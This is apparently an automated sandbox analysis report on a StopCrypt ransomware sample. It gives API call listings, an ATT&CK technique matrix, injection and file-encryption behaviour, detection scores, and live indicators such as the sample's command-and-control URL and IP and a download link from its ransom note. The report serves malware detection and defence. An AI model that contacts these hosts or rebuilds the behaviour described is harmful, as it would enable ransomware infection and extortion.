          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_0040C762
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_004133BC
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_004335E7
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,5_2_004387C8
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,5_2_0043884E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,5_2_00432B6D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,5_2_00437BB3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,5_2_00437E27
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437E83
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437F00
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0042BF17
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,5_2_00437F83
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_00432FAD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_1_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_1_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_1_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,5_1_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_1_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_1_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,10_2_0043404A
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,10_2_00438178
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00440116
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_004382A2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,10_2_0043834F
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,10_2_00438423
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: EnumSystemLocalesW,10_2_004387C8
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: GetLocaleInfoW,10_2_0043884E
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,10_2_00432B6D
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,10_2_00432FAD
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_004335E7
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00427756 cpuid 5_2_00427756
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040B1E4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0040B1E4
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_0042FE47
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API1 | Application Shimming1 | Exploitation for Privilege Escalation1 | Deobfuscate/Decode Files or Information1 | OS Credential Dumping | System Time Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Default Accounts | Command and Scripting Interpreter3 | Registry Run Keys / Startup Folder1 | Application Shimming1 | Obfuscated Files or Information3 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Screen Capture1 | Exfiltration Over Bluetooth | Encrypted Channel21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Services File Permissions Weakness1 | Process Injection212 | Software Packing22 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder1 | Masquerading1 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Services File Permissions Weakness1 | Process Injection212 | LSA Secrets | Security Software Discovery141 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Services File Permissions Weakness1 | Cached Domain Credentials | Process Discovery3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Network Configuration Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

          Behavior Graph

Behavior Graph ID: 496234 | Sample: NZPC0PFaC0.exe | Startdate: 04/10/2021 | Architecture: WINDOWS | Score: 100
(graph image not reproduced; the node information recoverable from the graph text follows)

Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 4 other signatures
Start: NZPC0PFaC0.exe started (4 instances)
- NZPC0PFaC0.exe [Injects a PE file into a foreign processes] -> started NZPC0PFaC0.exe 19
  - contacts securebiz.org 123.213.233.194, 49757, 80, SKB-ASSKBroadbandCoLtdKR Korea Republic of
  - dropped: C:\Users\user\Desktop\...\SUAVTZKNFL.jpg, data; C:\Users\user\Desktop\...\QNCYCDFIJJ.docx, data; C:\Users\user\Desktop\...\PWCCAWLGRE.pdf, data; 3 other malicious files
  - signature: Modifies existing user documents (likely ransomware behavior)
- NZPC0PFaC0.exe [Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Contains functionality to inject code into remote processes] -> started NZPC0PFaC0.exe 1 17
  - contacts api.2ip.ua 77.123.139.190, 443, 49750, 49751, VOLIA-ASUA Ukraine
  - dropped: C:\Users\user\AppData\...\NZPC0PFaC0.exe, PE32; C:\Users\...\NZPC0PFaC0.exe:Zone.Identifier, ASCII
  - started NZPC0PFaC0.exe [Injects a PE file into a foreign processes] -> started NZPC0PFaC0.exe 13, which contacts api.2ip.ua
  - started icacls.exe
- NZPC0PFaC0.exe [Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file] -> started NZPC0PFaC0.exe 13
- NZPC0PFaC0.exe -> started NZPC0PFaC0.exe 13

          Screenshots

(screenshot thumbnails not reproduced)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
NZPC0PFaC0.exe | 35% | Virustotal |
NZPC0PFaC0.exe | 56% | ReversingLabs | Win32.Ransomware.StopCrypt
NZPC0PFaC0.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | 56% | ReversingLabs | Win32.Ransomware.StopCrypt

          Unpacked PE Files

Source | Detection | Scanner | Label
10.2.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
16.2.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
12.1.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
10.1.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
5.2.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
16.1.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
13.1.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
12.2.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
13.2.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749
5.1.NZPC0PFaC0.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131749

          Domains

Source | Detection | Scanner | Label
securebiz.org | 18% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | 0% | Avira URL Cloud | safe
http://securebiz.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C | 0% | Avira URL Cloud | safe
http://www.wikipedia.com/ | 0% | URL Reputation | safe
http://securebiz.org/fhsgtsspen6/get.php | 19% | Virustotal |
http://securebiz.org/fhsgtsspen6/get.php | 0% | Avira URL Cloud | safe
https://we.tl/t-1JwFK5rT | 0% | Avira URL Cloud | safe
https://we.tl/t-1JwFK5rT39 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
securebiz.org | 123.213.233.194 | true | true |  | unknown
api.2ip.ua | 77.123.139.190 | true | false |  | high

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://securebiz.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C | true | Avira URL Cloud: safe | unknown
http://securebiz.org/fhsgtsspen6/get.php | true | 19%, Virustotal; Avira URL Cloud: safe | unknown
https://api.2ip.ua/geo.json | false |  | high

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.nytimes.com/ | NZPC0PFaC0.exe, 00000010.00000003.376954535.0000000003500000.00000004.00000010.sdmp | false |  | high
https://api.2ip.ua/ | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high
https://api.2ip.ua/geo.jsont | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high
https://api.2ip.ua//Wjn | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high
http://www.youtube.com/ | NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmp | false |  | high
https://api.2ip.ua/geo.jsonS | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high
https://api.2ip.ua/geo.jsons | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high
http://www.wikipedia.com/ | NZPC0PFaC0.exe, 00000010.00000003.377181082.0000000003500000.00000004.00000010.sdmp | false | URL Reputation: safe | unknown
http://www.amazon.com/ | NZPC0PFaC0.exe, 00000010.00000003.376736269.0000000003500000.00000004.00000010.sdmp | false |  | high
http://www.live.com/ | NZPC0PFaC0.exe, 00000010.00000003.376822071.0000000003500000.00000004.00000010.sdmp | false |  | high
http://www.reddit.com/ | NZPC0PFaC0.exe, 00000010.00000003.377028462.0000000003500000.00000004.00000010.sdmp | false |  | high
http://www.twitter.com/ | NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmp | false |  | high
https://we.tl/t-1JwFK5rT | NZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://www.openssl.org/support/faq.html | NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp | false |  | high
https://api.2ip.ua/geo.jsonC | NZPC0PFaC0.exe, 0000000A.00000002.332958697.0000000000890000.00000004.00000020.sdmp | false |  | high
https://we.tl/t-1JwFK5rT39 | NZPC0PFaC0.exe, 00000010.00000002.554723819.00000000007A9000.00000004.00000020.sdmp, _readme.txt0.16.dr | true | Avira URL Cloud: safe | unknown
http://www.google.com/ | NZPC0PFaC0.exe, 00000010.00000003.376800469.0000000003500000.00000004.00000010.sdmp | false |  | high
https://api.2ip.ua/geo.jsonyZ3 | NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmp | false |  | high

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
123.213.233.194 | securebiz.org | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
77.123.139.190 | api.2ip.ua | Ukraine | 25229 | VOLIA-ASUA | false

                                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 496234
Start date: 04.10.2021
Start time: 12:28:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 6s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: NZPC0PFaC0.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@18/166@6/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 15% (good quality ratio 14.6%)
• Quality average: 84.7%
• Quality standard deviation: 22%
HCA Information:
• Successful, ratio: 84%
• Number of executed functions: 30
• Number of non-executed functions: 214
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.203.141.148, 52.184.81.210, 2.20.178.10, 2.20.178.56, 20.199.120.151, 52.139.176.199, 2.20.178.33, 2.20.178.24, 20.199.120.182, 20.54.110.249, 40.112.88.60, 20.199.120.85
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
